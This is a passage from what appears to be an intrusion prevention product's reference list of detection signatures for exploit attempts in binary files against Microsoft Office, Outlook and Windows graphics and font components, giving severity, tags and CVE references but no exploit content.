Vulnerability: Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-12, CVE2010, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-08, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Office-CVE-2017-0014

About this situation: An attempt to exploit a vulnerability in Microsoft Office
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2017-03, CVE2017, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Office-CVE-2017-0014
Description:
Back to top

File-Binary_Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2008-08, CVE2008, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Jet Engine (msjet40.dll) detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Jet Engine, MS2008-05, CVE2007, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Project, Microsoft Office, Microsoft Works, MS2008-08, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Project, Microsoft Office, Microsoft Works, MS2008-08, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1339-5242
Vulnerability: Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Office-Pict-Image-Converter-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office Converter Pack, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Pict-Image-Converter-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2007, Microsoft Office 2010, MS2010-12, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-539-5211
Vulnerability: Microsoft-Office-TIFF-Converter-Heap-Overflow-CVE-2010-3947
Description: CVE References: CVE-2010-3947
Back to top

File-Binary_Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office Converter Pack detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Office Converter Pack, MS2009-04, CVE2009, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Word-Wordperfect-Converter-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
Description:
Back to top

File-Binary_Microsoft-OpenType-Font-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-OpenType-Font-Handling-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-OpenType-Font-Index-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-OpenType-Font-Index-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Outlook-Compressed-TNEF-RTF-Memory-Corruption

About this situation: Detected a potential Outlook exploit
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-09, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Exchange-Outlook-Compressed-RTF-Parsing-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2023-03, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1569-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
Description:
Back to top

File-Binary_Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397-2

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2023-03, CVE2023, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Microsoft-Outlook-Elevation-Of-Privilege-Vulnerability-CVE-2023-23397
Description:
Back to top

File-Binary_Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587

About this situation: A vulnerability in Microsoft Outlook
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587
Description:
Back to top

File-Binary_Microsoft-Outlook-Rwz-CVE-2018-8587-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office 365 ProPlus detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1339-5242
Vulnerability: Microsoft-Outlook-Out-Of-Bounds-Vulnerability-CVE-2018-8587
Description:
Back to top

File-Binary_Microsoft-Outlook-Rwz-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office 365 ProPlus detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Microsoft-Outlook-Rwz-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Outlook-SMB-Attachment

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-07, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office Outlook detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-07, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-09, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft SQL Server detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, MS2008-07, CVE2008, Windows not specific, Microsoft SQL Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
Description:
Back to top

File-Binary_Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, MS2021-09, CVE2021, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Vulnerability: Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0091-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
Description:
Back to top

File-Binary_Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption-2

About this situation: An attempt to exploit a vulnerability in Microsoft Lync detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows Server, Microsoft Lync, MS2013-12, CVE2013, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-552-5211
Vulnerability: Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability

About this situation: A vulnerability in Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-11, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Windows-Briefcase-Integer-Overflow-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability

About this situation: A vulnerability in Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-11, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Windows-Briefcase-Integer-Underflow-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Windows-Cab-File-Parsing-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Microsoft-Windows-Cab-File-Parsing-Directory-Traversal
Description:
Back to top

File-Binary_Microsoft-Windows-Compiled-Help

About this situation: Microsoft Windows Compiled Help file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Windows-Devicemetadata-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-01, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1251-5242
Vulnerability: Microsoft-Windows-Devicemetadata-Path-Traversal
Description:
Back to top

File-Binary_Microsoft-Windows-DVR-MS-CVE-2011-0042

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows Vista, Windows 7, Windows 2008 R2, Any Hardware, MS2011-03, CVE2011, Windows XP not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-DVR-MS-CVE-2011-0042
Description:
Back to top

File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-CVE-2018-0761

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1049-5242
Vulnerability: Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability-2
Description:
Back to top

File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Vulnerability: Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability
Description:
Back to top

File-Binary_Microsoft-Windows-Fax-Cover-Sheet

About this situation: Microsoft Windows Fax Cover Sheet file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-04, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
Description:
Back to top

File-Binary_Microsoft-Windows-Fax-Services-Cover-Page-Heap-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Microsoft Windows Fax Services deteted
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows 7, Any Hardware, MS2011-04, CVE2010, Windows XP not specific, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Font-Library-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1068-5242
Vulnerability: Microsoft-Windows-Font-Library-Remote-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Font-Parsing-CVE-2012-2897

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows RT, Windows 2012, Windows 2008, Any Hardware, MS2012-11, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-491-5211
Vulnerability: Microsoft-Windows-Font-Parsing-CVE-2012-2897
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow

About this situation: Suspicious EMF image file detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-04, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1689-5242
Vulnerability: HTTP-Microsoft-Windows-GDI-EMF-Image-File-Handling-Stack-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow

About this situation: Detects EMF images potentially exploiting MS09-006
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-03, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows GDI detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Graphics Device Interface, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Windows-GDI-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-04, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-04, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-589-5211
Last changed: sgpkg-ips-589-5211
Vulnerability: Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-12, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1652-5242
Vulnerability: Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-408-4219
Vulnerability: Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Expression Web detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Office, MS2009-10, CVE2009, Windows not specific, Internet Explorer not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
Description: CVE References: CVE-2009-2502
Back to top

File-Binary_Microsoft-Windows-Gdiplus-WMF-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel Viewer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2009-10, CVE2009, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: Microsoft-Windows-Gdiplus-WMF-Integer-Overflow
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Vulnerability: Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Live Meeting Console detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Vulnerability: Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Live Meeting Console detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-793-5211
Vulnerability: Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Vulnerability: Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239
Description:
Back to top

File-Binary_Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
